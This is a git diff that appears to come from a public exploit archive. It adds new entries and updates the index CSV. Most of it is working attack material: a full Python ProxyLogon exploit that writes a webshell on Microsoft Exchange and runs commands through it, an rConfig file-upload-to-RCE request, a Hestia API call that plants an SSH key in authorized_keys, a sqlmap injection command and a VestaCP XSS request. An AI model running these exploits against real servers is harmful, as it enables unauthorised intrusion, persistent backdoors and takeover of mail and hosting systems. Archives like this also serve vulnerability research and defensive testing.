diff --git a/exploits/multiple/webapps/49662.txt b/exploits/multiple/webapps/49662.txt new file mode 100644 index 000000000..714ad30d3 --- /dev/null +++ b/exploits/multiple/webapps/49662.txt @@ -0,0 +1,24 @@ +# Title: VestaCP 0.9.8 - 'v_interface' Add IP Stored XSS +# Date: 07.03.2021 +# Author: Numan Türle +# Vendor Homepage: https://vestacp.com +# Software Link: https://myvestacp.com < 0.9.8-26-43 +# Software Link: https://vestacp.com < 0.9.8-26 +# Tested on: VestaCP + +POST /add/ip/ HTTP/1.1 +Host: TARGET:8083 +Connection: close +Content-Length: 165 +Cache-Control: max-age=0 +Origin: https://TARGET:8083 +Content-Type: application/x-www-form-urlencoded +User-Agent: USER-AGENT +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: https://TARGET:8083/add/ip/ +Accept-Encoding: gzip, deflate +Accept-Language: en,tr-TR; +Cookie: PHPSESSID=udiudv2k0707d6k3p3fi1n1qk0 +sec-gpc: 1 + +token=04331c937aeb2d203889b3fb86fa75b2&ok=Add&v_ip=90.7.3.1&v_netmask=255.0.0.0&v_interface=&v_shared=on&v_owner=admin&v_name=&v_nat=&ok=Add \ No newline at end of file diff --git a/exploits/php/webapps/49178.bash b/exploits/php/webapps/49178.sh old mode 100644 new mode 100755 similarity index 100% rename from exploits/php/webapps/49178.bash rename to exploits/php/webapps/49178.sh diff --git a/exploits/php/webapps/49665.txt b/exploits/php/webapps/49665.txt new file mode 100644 index 000000000..c34423e41 --- /dev/null +++ b/exploits/php/webapps/49665.txt @@ -0,0 +1,70 @@ +# Exploit Title: rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) +# Date: 2021-03-17 +# Exploit Author: Murat ŞEKER +# Vendor Homepage: https://www.rconfig.com +# Software Link: https://www.rconfig.com/downloads/rconfig-3.9.6.zip +# Version: rConfig v3.9.6 +# Install scripts  : +# https://www.rconfig.com/downloads/scripts/install_rConfig.sh +# https://www.rconfig.com/downloads/scripts/centos7_install.sh +# https://www.rconfig.com/downloads/scripts/centos6_install.sh +# Tested on: centOS 7 +# Notes : If you want to reproduce in your lab environment follow those links : +# http://help.rconfig.com/gettingstarted/installation +# then +# http://help.rconfig.com/gettingstarted/postinstall + +# Description: +rConfig, the open source network device configuration management tool, is vulnerable to Arbitrary File Upload to RCE in /lib/crud/vendors.crud.php with parameter 'vendorLogo'. + +The following steps can be carried out in duplicating this vulnerability. + +- Login the rConfig application with your credentials. +- Repeat  + +POST /lib/crud/vendors.crud.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@5y4o1s35jvx342apl7392qrqxh3m7aw.burpcollaborator.net +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------122590832918963661283831488254 +Content-Length: 36619 +Origin: https://localhost +Connection: close +Referer: http://4hmnkrm42ug2n1to46m8lpapggmlp9e.burpcollaborator.net/ref +Cookie: PHPSESSID=eafcfe393af7dc2a3dd9bd1ea0e9e49b +Upgrade-Insecure-Requests: 1 +Cache-Control: no-transform + +-----------------------------122590832918963661283831488254 +Content-Disposition: form-data; name="vendorName" + +thisisrce +-----------------------------122590832918963661283831488254 +Content-Disposition: form-data; name="vendorLogo"; filename="file.php" +Content-Type: image/png + + +-----------------------------122590832918963661283831488254 +Content-Disposition: form-data; name="add" + +add +-----------------------------122590832918963661283831488254 +Content-Disposition: form-data; name="editid" + + +-----------------------------122590832918963661283831488254-- + + + +- Than go to http(s):///images/vendor/file.php + +Note: The file.php can be accessed without valid credentials. + + +If you change the to + +and navigate the http(s):///images/vendor/file.php?cmd=id + +The `id` command will execute on server. \ No newline at end of file diff --git a/exploits/php/webapps/49666.txt b/exploits/php/webapps/49666.txt new file mode 100644 index 000000000..f0db91ef8 --- /dev/null +++ b/exploits/php/webapps/49666.txt @@ -0,0 +1,15 @@ +# Exploit Title: SEO Panel 4.8.0 - 'order_col' Blind SQL Injection +# Date: 17/02/2021 +# Exploit Author: Piyush Patil +# Vendor Homepage: https://www.seopanel.org/ +# Software Link: https://github.com/seopanel/Seo-Panel/releases/tag/4.8.0 +# Version: 4.8.0 + + +# Reference - https://github.com/seopanel/Seo-Panel/issues/209 + +Step 1 - Login to the SEO Panel with admin credentials. +Step 2 - Go to archive.php +Step 3 - Change "order_col" value to "*" and copy the request +Command: sqlmap -r request.txt --batch --level 5 --risk 3 --dbms MYSQL +--dbs --technique=T --flush-session \ No newline at end of file diff --git a/exploits/php/webapps/49667.txt b/exploits/php/webapps/49667.txt new file mode 100644 index 000000000..76a810ab9 --- /dev/null +++ b/exploits/php/webapps/49667.txt @@ -0,0 +1,17 @@ +# Title: Hestia Control Panel 1.3.2 - Arbitrary File Write +# Date: 07.03.2021 +# Author: Numan Türle +# Vendor Homepage: https://hestiacp.com/ +# Software Link: https://github.com/hestiacp/hestiacp +# Version: < 1.3.3 +# Tested on: HestiaCP Version 1.3.2 + +curl --location --request POST 'https://TARGET:8083/api/index.php' \ +--form 'hash="HERE_API_KEY"' \ +--form 'returncode="yes"' \ +--form 'cmd="v-make-tmp-file"' \ +--form 'arg1="ssh-rsa HERE_KEY"' \ +--form 'arg2="/home/admin/.ssh/authorized_keys"' \ +--form 'arg3=""' \ +--form 'arg4=""' \ +--form 'arg5=""' \ No newline at end of file diff --git a/exploits/windows/local/49661.txt b/exploits/windows/local/49661.txt new file mode 100644 index 000000000..a87863a93 --- /dev/null +++ b/exploits/windows/local/49661.txt @@ -0,0 +1,29 @@ +# Exploit Title: VFS for Git 1.0.21014.1 - 'GVFS.Service' Unquoted Service Path +# Date: 2021-2-6 +# Exploit Author: Mohammed Alshehri +# Vendor Homepage: https://vfsforgit.org/ +# Software Link: https://github.com/microsoft/VFSForGit/releases/download/v1.0.21014.1/SetupGVFS.1.0.21014.1.exe +# Version: 1.0.21014.1 +# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 + + +# Service info: +C:\Users\m507>sc qc GVFS.Service +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: GVFS.Service + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\GVFS\GVFS.Service.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : GVFS.Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\Users\m507> + + +# Exploit: +This vulnerability could permit executing code during startup or reboot with the escalated privileges. \ No newline at end of file diff --git a/exploits/windows/remote/49663.py b/exploits/windows/remote/49663.py new file mode 100755 index 000000000..eb4418278 --- /dev/null +++ b/exploits/windows/remote/49663.py @@ -0,0 +1,183 @@ +import requests +from urllib3.exceptions import InsecureRequestWarning +import random +import string +import sys + + +def id_generator(size=6, chars=string.ascii_lowercase + string.digits): + return ''.join(random.choice(chars) for _ in range(size)) + +if len(sys.argv) < 2: + print("使用方式: python PoC.py ") + print("使用方式: python PoC.py mail.btwaf.cn test2@btwaf.cn") + exit() + +proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"} +requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) +target = sys.argv[1] +email = sys.argv[2] +random_name = id_generator(4) + ".js" +user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" + +shell_path = "Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\test11.aspx" +shell_absolute_path = "\\\\127.0.0.1\\c$\\%s" % shell_path + +# webshell-马子内容 +shell_content = '' + +autoDiscoverBody = """ + + %s http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a + + +""" % email + +print("正在获取Exchange Server " + target+"权限") +print("=============================") +FQDN = "EXCHANGE01" +ct = requests.get("https://%s/ecp/%s" % (target, random_name), headers={"Cookie": "X-BEResource=localhost~1942062522", + "User-Agent": user_agent}, + verify=False,proxies=proxies) + +if "X-CalculatedBETarget" in ct.headers and "X-FEServer" in ct.headers: + FQDN = ct.headers["X-FEServer"] + + +ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ + "Cookie": "X-BEResource=%s/autodiscover/autodiscover.xml?a=~1942062522;" % FQDN, + "Content-Type": "text/xml", + "User-Agent": user_agent}, + data=autoDiscoverBody, + proxies=proxies, + verify=False + ) + +if ct.status_code != 200: + print(ct.status_code) + print("Autodiscover Error!") + exit() + +if "" not in str(ct.content): + print("Can not get LegacyDN!") + exit() + +legacyDn = str(ct.content).split("")[1].split(r"")[0] +print("Got DN: " + legacyDn) + +mapi_body = legacyDn + "\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00" + +ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ + "Cookie": "X-BEResource=Administrator@%s:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;" % FQDN, + "Content-Type": "application/mapi-http", + "X-Requesttype": "Connect", + "X-Clientinfo": "{2F94A2BF-A2E6-4CCCC-BF98-B5F22C542226}", + "X-Clientapplication": "Outlook/15.0.4815.1002", + "X-Requestid": "{E2EA6C1C-E61B-49E9-9CFB-38184F907552}:123456", + "User-Agent": user_agent +}, + data=mapi_body, + verify=False, +proxies=proxies + ) +if ct.status_code != 200 or "act as owner of a UserMailbox" not in str(ct.content): + print("Mapi Error!") + exit() + +sid = str(ct.content).split("with SID ")[1].split(" and MasterAccountSid")[0] + +print("Got SID: " + sid) +sid = sid.replace(sid.split("-")[-1],"500") + +proxyLogon_request = """%sS-1-1-0S-1-5-2S-1-5-11S-1-5-15S-1-5-5-0-6948923 +""" % sid + +ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ + "Cookie": "X-BEResource=Administrator@%s:444/ecp/proxyLogon.ecp?a=~1942062522;" % FQDN, + "Content-Type": "text/xml", + "msExchLogonMailbox": "S-1-5-20", + "User-Agent": user_agent +}, + data=proxyLogon_request, +proxies=proxies, + verify=False + ) +if ct.status_code != 241 or not "set-cookie" in ct.headers: + print("Proxylogon Error!") + exit() + +sess_id = ct.headers['set-cookie'].split("ASP.NET_SessionId=")[1].split(";")[0] + +msExchEcpCanary = ct.headers['set-cookie'].split("msExchEcpCanary=")[1].split(";")[0] +print("Got session id: " + sess_id) +print("Got canary: " + msExchEcpCanary) + +ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ + "Cookie": "X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % ( + FQDN, msExchEcpCanary, sess_id, msExchEcpCanary), + "Content-Type": "application/json; ", + "msExchLogonMailbox": "S-1-5-20", + "User-Agent": user_agent + +}, + json={"filter": { + "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", + "SelectedView": "", "SelectedVDirType": "All"}}, "sort": {}}, + verify=False + ) + +if ct.status_code != 200: + print("GetOAB Error!") + exit() +oabId = str(ct.content).split('"RawIdentity":"')[1].split('"')[0] +print("Got OAB id: " + oabId) + +oab_json = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId}, + "properties": { + "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", + "ExternalUrl": "http://ffff/#%s" % shell_content}}} + +ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ + "Cookie": "X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % ( + FQDN, msExchEcpCanary, sess_id, msExchEcpCanary), + "msExchLogonMailbox": "S-1-5-20", + "Content-Type": "application/json; charset=utf-8", + "User-Agent": user_agent +}, + json=oab_json, + verify=False + ) +if ct.status_code != 200: + print("Set external url Error!") + exit() + +reset_oab_body = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId}, + "properties": { + "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", + "FilePathName": shell_absolute_path}}} + +ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ + "Cookie": "X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % ( + FQDN, msExchEcpCanary, sess_id, msExchEcpCanary), + "msExchLogonMailbox": "S-1-5-20", + "Content-Type": "application/json; charset=utf-8", + "User-Agent": user_agent +}, + json=reset_oab_body, + verify=False + ) + +if ct.status_code != 200: + print("写入shell失败了啊") + exit() + +print("成功了。马上就验证shell是否OK!") +print("POST shell:https://"+target+"/owa/auth/test11.aspx") +shell_url="https://"+target+"/owa/auth/test11.aspx" +print('code=Response.Write(new ActiveXObject("WScript.Shell").exec("whoami").StdOut.ReadAll());') +print("正在请求shell") +data=requests.post(shell_url,data={"code":"Response.Write(new ActiveXObject(\"WScript.Shell\").exec(\"whoami\").StdOut.ReadAll());"},verify=False) +if data.status_code != 200: + print("写入shell失败") +else: + print("权限如下:"+data.text.split("OAB (Default Web Site)")[0].replace("Name : ","")) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 73420466a..ed5498318 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11291,6 +11291,7 @@ id,file,description,date,author,type,platform,port 49655,exploits/windows/local/49655.py,"GeoGebra CAS Calculato‪r‬ 6.0.631.0 - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows, 49656,exploits/android/local/49656.py,"GeoGebra 3D Calculator 5.0.511.0 - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,android, 49660,exploits/windows/local/49660.py,"FastStone Image Viewer 7.5 - .cur BITMAPINFOHEADER 'BitCount' Stack Based Buffer Overflow (ASLR & DEP Bypass)",2021-03-17,"Paolo Stagno",local,windows, +49661,exploits/windows/local/49661.txt,"VFS for Git 1.0.21014.1 - 'GVFS.Service' Unquoted Service Path",2021-03-18,"Mohammed Alshehri",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -18411,6 +18412,7 @@ id,file,description,date,author,type,platform,port 49613,exploits/linux/remote/49613.py,"AnyDesk 5.5.2 - Remote Code Execution",2021-03-03,scryh,remote,linux, 49621,exploits/java/remote/49621.java,"CatDV 9.2 - RMI Authentication Bypass",2021-03-05,"Christopher Ellis",remote,java, 49629,exploits/windows/remote/49629.py,"Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2)",2021-03-09,1F98D,remote,windows, +49663,exploits/windows/remote/49663.py,"Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon)",2021-03-14,F5,remote,windows, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -43515,7 +43517,7 @@ id,file,description,date,author,type,platform,port 49174,exploits/php/webapps/49174.txt,"Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover",2020-12-02,"Mufaddal Masalawala",webapps,php, 49175,exploits/php/webapps/49175.txt,"Simple College Website 1.0 - 'page' Local File Inclusion",2020-12-02,Mosaaed,webapps,php, 49177,exploits/php/webapps/49177.txt,"Car Rental Management System 1.0 - SQL Injection / Local File include",2020-12-02,Mosaaed,webapps,php, -49178,exploits/php/webapps/49178.bash,"WordPress Plugin Wp-FileManager 6.8 - RCE",2020-12-02,"Mansoor R",webapps,php, +49178,exploits/php/webapps/49178.sh,"WordPress Plugin Wp-FileManager 6.8 - RCE",2020-12-02,"Mansoor R",webapps,php, 49180,exploits/php/webapps/49180.txt,"User Registration & Login and User Management System 2.1 - Cross Site Request Forgery",2020-12-03,"Dipak Panchal",webapps,php, 49181,exploits/php/webapps/49181.txt,"Coastercms 5.8.18 - Stored XSS",2020-12-03,"Hardik Solanki",webapps,php, 49182,exploits/multiple/webapps/49182.txt,"EgavilanMedia Address Book 1.0 Exploit - SQLi Auth Bypass",2020-12-03,"Mayur Parmar",webapps,multiple, @@ -43833,15 +43835,19 @@ id,file,description,date,author,type,platform,port 49633,exploits/multiple/webapps/49633.py,"Atlassian JIRA 8.11.1 - User Enumeration",2021-03-10,"Dolev Farhi",webapps,multiple, 49634,exploits/hardware/webapps/49634.txt,"NuCom 11N Wireless Router 5.07.90 - Remote Privilege Escalation",2021-03-11,LiquidWorm,webapps,hardware, 49635,exploits/php/webapps/49635.txt,"MyBB OUGC Feedback Plugin 1.8.22 - Cross-Site Scripting",2021-03-11,0xB9,webapps,php, -49637,exploits/windows/webapps/49637.py,"Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon)",2021-03-11,testanull,webapps,windows, +49637,exploits/windows/webapps/49637.py,"Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon) (PoC)",2021-03-11,testanull,webapps,windows, 49639,exploits/php/webapps/49639.txt,"Monitoring System (Dashboard) 1.0 - 'uname' SQL Injection",2021-03-12,"Richard Jones",webapps,php, 49640,exploits/php/webapps/49640.py,"Monitoring System (Dashboard) 1.0 - File Upload RCE (Authenticated)",2021-03-12,"Richard Jones",webapps,php, 49642,exploits/php/webapps/49642.txt,"Zenario CMS 8.8.53370 - 'id' Blind SQL Injection",2021-03-15,"Balaji Ayyasamy",webapps,php, 49643,exploits/php/webapps/49643.txt,"MagpieRSS 0.72 - 'url' Command Injection and Server Side Request Forgery",2021-03-15,bl4ckh4ck5,webapps,php, -49644,exploits/php/webapps/49644.txt,"rConfig 3.9.6 - 'path' Local File Inclusion (Authenticated)",2021-03-15,5a65726f,webapps,php, +49644,exploits/php/webapps/49644.txt,"rConfig 3.9.6 - 'path' Local File Inclusion (Authenticated)",2021-03-15,"Murat ŞEKER",webapps,php, 49649,exploits/multiple/webapps/49649.txt,"openMAINT openMAINT 2.1-3.3-b - 'Multiple' Persistent Cross-Site Scripting",2021-03-15,"Hosein Vita",webapps,multiple, 49650,exploits/multiple/webapps/49650.py,"Sonlogger 4.2.3.3 - SuperAdmin Account Creation / Information Disclosure",2021-03-15,"Berkan Er",webapps,multiple, 49651,exploits/multiple/webapps/49651.rb,"SonLogger 4.2.3.3 - Unauthenticated Arbitrary File Upload (Metasploit)",2021-03-15,"Berkan Er",webapps,multiple, 49652,exploits/php/webapps/49652.py,"Alphaware E-Commerce System 1.0 - Unauthenicated Remote Code Execution (File Upload + SQL injection)",2021-03-16,"Christian Vierschilling",webapps,php, 49657,exploits/php/webapps/49657.txt,"WoWonder Social Network Platform 3.1 - 'event_id' SQL Injection",2021-03-17,securityforeveryone.com,webapps,php, 49659,exploits/multiple/webapps/49659.html,"VestaCP 0.9.8 - File Upload CSRF",2021-03-17,"Fady Mohammed Osman",webapps,multiple, +49662,exploits/multiple/webapps/49662.txt,"VestaCP 0.9.8 - 'v_interface' Add IP Stored XSS",2021-03-18,"numan türle",webapps,multiple, +49666,exploits/php/webapps/49666.txt,"SEO Panel 4.8.0 - 'order_col' Blind SQL Injection",2021-03-18,"Piyush Patil",webapps,php, +49667,exploits/php/webapps/49667.txt,"Hestia Control Panel 1.3.2 - Arbitrary File Write",2021-03-18,"numan türle",webapps,php, +49665,exploits/php/webapps/49665.txt,"rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated)",2021-03-18,"Murat ŞEKER",webapps,php,